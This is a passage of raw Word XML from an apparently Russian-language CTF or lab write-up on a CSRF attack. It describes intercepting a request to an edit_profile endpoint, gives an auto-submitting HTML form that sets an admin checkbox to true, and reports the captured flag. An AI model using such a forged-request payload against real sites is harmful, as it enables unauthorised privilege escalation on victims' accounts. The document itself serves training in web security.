      </w:r>
      <w:r w:rsidR="00EE1540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(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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B5518C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В перехвате видим </w:t>
      </w:r>
      <w:r w:rsidR="001501DE" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="001501DE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B5518C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наш запрос, который не </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5518C" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>зафильтровался</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE1540" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5)</w:t>
      </w:r>
      <w:r w:rsidR="00B5518C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. Нам важно, что метод </w:t>
      </w:r>
      <w:r w:rsidR="00B5518C" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidR="00B5518C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с параметром </w:t>
      </w:r>
      <w:r w:rsidR="00B5518C" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r w:rsidR="00B5518C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5518C" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidR="00C9613D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– фиксируем </w:t>
      </w:r>
      <w:r w:rsidR="00C9613D" w:rsidRPr="006B3AE2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это, на данный момент у нас есть вся информация для формирования </w:t>
      </w:r>
      <w:r w:rsidR="00C9613D" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00C9613D" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-запроса</w:t>
      </w:r>
      <w:r w:rsidR="00EE1540"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(6)</w:t>
      </w:r>
      <w:r w:rsidR="00C9613D" w:rsidRPr="006B3AE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43F8A12" w14:textId="5B742E63" w:rsidR="00D2220F" w:rsidRPr="006B3AE2" w:rsidRDefault="00D2220F" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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Часть кода для запроса возьмём из исходного кода </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r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страницы, форму из метода </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r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и скрипт из ранее выполнявшейся лабораторной работы на сайте </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>portswigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE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6B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> на данную тему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D29EB8" w14:textId="4F9D50C6" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6130AEA5" w14:textId="23A8CD4E" w:rsidR="0026286E" w:rsidRPr="006B3AE2" w:rsidRDefault="0026286E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED04A30" w14:textId="70FCBFB0" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;form action=</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5" w:rsidRPr="000C6139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0C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>edit_profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D622E5" w:rsidRPr="000C6139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0C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> method=</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5" w:rsidRPr="000C6139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0C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5" w:rsidRPr="000C6139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0C6139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14:paraId="57BAD6CC" w14:textId="5E94FB40" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;input name="name" type="text" value="</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sam</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF3543" w14:textId="2430B1E3" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>textarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> name="profile" </w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sam</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>textarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C6139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14:paraId="693B2D6B" w14:textId="77895EEB" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;input type="checkbox" name="admin" value="true"</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> checked</w:t>
      </w:r>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&gt; Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A5929" w14:textId="77777777" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;input class="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>btn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" type="submit" value="APPLY CHANGES"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B33F7" w14:textId="77777777" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E" w:rsidP="005B513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C6139">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51155BCD" w14:textId="77777777" w:rsidR="005B513E" w:rsidRPr="006B3AE2" w:rsidRDefault="005B513E" w:rsidP="005B513E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C6139">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[0].submit();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF597E0" w14:textId="7DB9A0A3" w:rsidR="005B513E" w:rsidRPr="000C6139" w:rsidRDefault="005B513E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C87B49D" w14:textId="3D28C134" w:rsidR="00356E1A" w:rsidRPr="006B3AE2" w:rsidRDefault="00356E1A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F88BD62" w14:textId="21F48B1E" w:rsidR="00356E1A" w:rsidRPr="00D622E5" w:rsidRDefault="00356E1A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После выполнения запроса</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5" w:rsidRPr="00D622E5">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (7)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> мы вернёмся на исходную страницу сайта. Необходимо ещё раз зайти в профиль</w:t>
      </w:r>
      <w:r w:rsidR="00EE1540" w:rsidRPr="00D622E5">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00EE1540" w:rsidRPr="00D622E5">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF1A8D" w14:textId="66E2277C" w:rsidR="00ED58E2" w:rsidRPr="006B3AE2" w:rsidRDefault="00ED58E2" w:rsidP="00ED58E2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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>олучаем флаг (</w:t>
      </w:r>
      <w:r w:rsidR="00D622E5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A474C" w14:textId="21D3F1B1" w:rsidR="00ED58E2" w:rsidRPr="006B3AE2" w:rsidRDefault="00ED58E2" w:rsidP="00ED58E2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000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{CSRF_@TTack_I$_p@In_1488}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A5A82" w14:textId="77777777" w:rsidR="00ED58E2" w:rsidRPr="006B3AE2" w:rsidRDefault="00ED58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38E9FCE" w14:textId="30D98402" w:rsidR="00E479EB" w:rsidRPr="006B3AE2" w:rsidRDefault="00E479EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A9FB3F" w14:textId="04368F6E" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDC7C2" w14:textId="488E3567" w:rsidR="00E479EB" w:rsidRPr="006B3AE2" w:rsidRDefault="00E479EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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585B8D2E" wp14:editId="7BB4FF0F">
            <wp:extent cx="5733415" cy="915035"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="15" name="Рисунок 1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AFD8" w14:textId="77777777" w:rsidR="00591AF0" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A37E32" w14:textId="75EDCA59" w:rsidR="007D3DE2" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C443C4C" w14:textId="6871BD90" w:rsidR="007D3DE2" w:rsidRPr="006B3AE2" w:rsidRDefault="007D3DE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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6D7137FC" wp14:editId="4C3332B7">
            <wp:extent cx="5733415" cy="1496695"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="16" name="Рисунок 1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8E9D" w14:textId="7601E212" w:rsidR="00591AF0" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414AB331" w14:textId="69C932F1" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B44714" w14:textId="2D17A9F3" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDFA764" w14:textId="4225988C" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3759F805" w14:textId="118CA465" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8B8298" w14:textId="121DDB23" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6C7FFE" w14:textId="4377088B" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488F8B18" w14:textId="45D80650" w:rsidR="00D622E5" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7708CD" w14:textId="77777777" w:rsidR="00D622E5" w:rsidRPr="006B3AE2" w:rsidRDefault="00D622E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E823E69" w14:textId="68FA9891" w:rsidR="001A3D71" w:rsidRPr="006B3AE2" w:rsidRDefault="00591AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3)</w:t>
      </w:r>
    </w:p>
